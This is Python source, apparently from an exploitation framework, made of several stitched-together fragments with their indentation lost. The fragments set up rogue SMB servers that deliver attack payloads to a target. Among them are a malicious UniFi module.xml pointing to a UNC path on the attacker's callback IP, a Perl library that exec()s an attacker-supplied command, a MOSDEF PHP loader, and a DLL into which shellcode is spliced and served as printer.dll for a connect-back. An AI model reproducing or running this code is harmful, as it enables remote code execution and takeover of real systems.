def setupSMBServer(self):
"""
Starts a listening SMB Server
"""
import smbserver
self.log("Starting SMBServer")
mysmbserver = smbserver.SMBServer("0.0.0.0", 445)
#two minutes divided by number of tries
mysmbserver.timeout = 120 / 4 + 10 #must stay up for two minutes at least
mysmbserver.target = self.host #make sure only target can connect
mysmbserver.set_file_data(self.filename,
self.filedata) #load the file data up
if mysmbserver.listen() == 0:
self.log("Could not listen!")
return
self.log("Accepting connections")
tries = 0
self.smblock.acquire()
self.smbinit = 1
self.smblock.release()
while mysmbserver.accept() == 0:
self.log("Waiting for new client... (Try: %d/3)" % (tries))
tries += 1
if tries > 3:
break
if self.ISucceeded():
break
if 1:
while mysmbserver.handle() and not self.state == self.HALT:
time.sleep(1)
self.log("Terminating SMBServer")
time.sleep(10)
return
def run(self):
self.exploit.log("Starting SMB server")
mysmbserver = smbserver.SMBServer(self.exploit.callback.ip, 445)
mysmbserver.timeout = 30
mysmbserver.target = self.exploit.host
# Set module.xml file
xml = ""
xml += "<UniFi>\n"
xml += " <Module name=\"\\\\\\\\?\\\\UNC\\\\" + self.exploit.callback.ip + "\\\\tmp\\\\d2\" priority=\"1\">\n"
xml += " <Library type=\"perl\" lib=\"d2\">\n"
xml += " <Method name=\"go\" svc=\"d2::go\" peer=\"inquire\"/>\n"
xml += " </Library>\n"
xml += " </Module>\n"
xml += "</UniFi>"
mysmbserver.set_file_data("d2\\module.xml", xml)
# Set library file
lib = ""
lib += "package d2;\n\n"
lib += "use 5.008003;\n"
lib += "use strict;\n"
lib += "use warnings;\n\n\n"
lib += "sub go { \n"
lib += " exec(\"" + self.cmd + "\");\n"
lib += " return 0;\n"
lib += "}\n\n"
lib += "1;\n"
lib += "__END__"
mysmbserver.set_file_data("d2\\lib\\d2.pm", lib)
if mysmbserver.listen() == 0:
self.exploit.log("Could not listen!")
return
self.exploit.log("SMB server accepting connections")
tries = 0
self.exploit.smblock.acquire()
self.exploit.smbinit = 1
self.exploit.smblock.release()
while mysmbserver.accept() == 0 and self.exploit.state!=self.exploit.HALT and self.suicide == False:
self.exploit.log("Waiting for new client... (Try: %d/4)" % (tries))
tries += 1
if tries > 4:
break
while mysmbserver.handle() and self.exploit.state!=self.exploit.HALT and self.suicide == False:
time.sleep(1)
mysmbserver.s.close()
self.exploit.log("Terminating SMB server")
def set_up_smb_server(self):
self.log("Starting smb server")
mysmbserver=smbserver.SMBServer("0.0.0.0", 445)
mysmbserver.set_file_data(self.phpfilename, self.get_php_to_mosdef()) #load the file data up
mysmbserver.timeout=5
if mysmbserver.listen() == 0:
self.log("Could not listen!")
return False
self.server=mysmbserver
self.log("Accepting connections via SMB for files")
return True
def run(self):
self.exploit.log('Starting SMB server')
mysmbserver=smbserver.SMBServer('0.0.0.0',445)
mysmbserver.timeout=30
mysmbserver.target=self.exploit.host
try:
f=open(self.dllpath)
dlldata=f.read()
f.close()
i=dlldata.find('c00kie')
if i<0 or len(self.exploit.shellcode)>0x1000:
self.exploit.log("Cookie in the DLL couldn't be found or Shellcode too long. Aborting.")
return
self.exploit.log('Injecting shellcode in the DLL')
dlldata=dlldata[:i]+self.exploit.shellcode+dlldata[i+len(self.exploit.shellcode):]
except:
self.exploit.log('Connect back binary couldn\'t be found/read!')
return
mysmbserver.set_file_data('printer.dll',dlldata)
if mysmbserver.listen()==0:
self.exploit.log('Could not listen!')
return
self.exploit.log('SMB server accepting connections')
tries=0
self.exploit.smblock.acquire()
self.exploit.smbinit=1
self.exploit.smblock.release()
while mysmbserver.accept()==0 and self.exploit.state!=self.exploit.HALT and self.suicide==False:
self.exploit.log('Waiting for new client... (Try: %d/4)'%(tries))
tries+=1
if tries>4:
break
if self.exploit.ISucceeded():
break
while mysmbserver.handle() and self.exploit.state!=self.exploit.HALT and self.suicide==False:
time.sleep(1)
self.exploit.log('Terminating SMB server')
return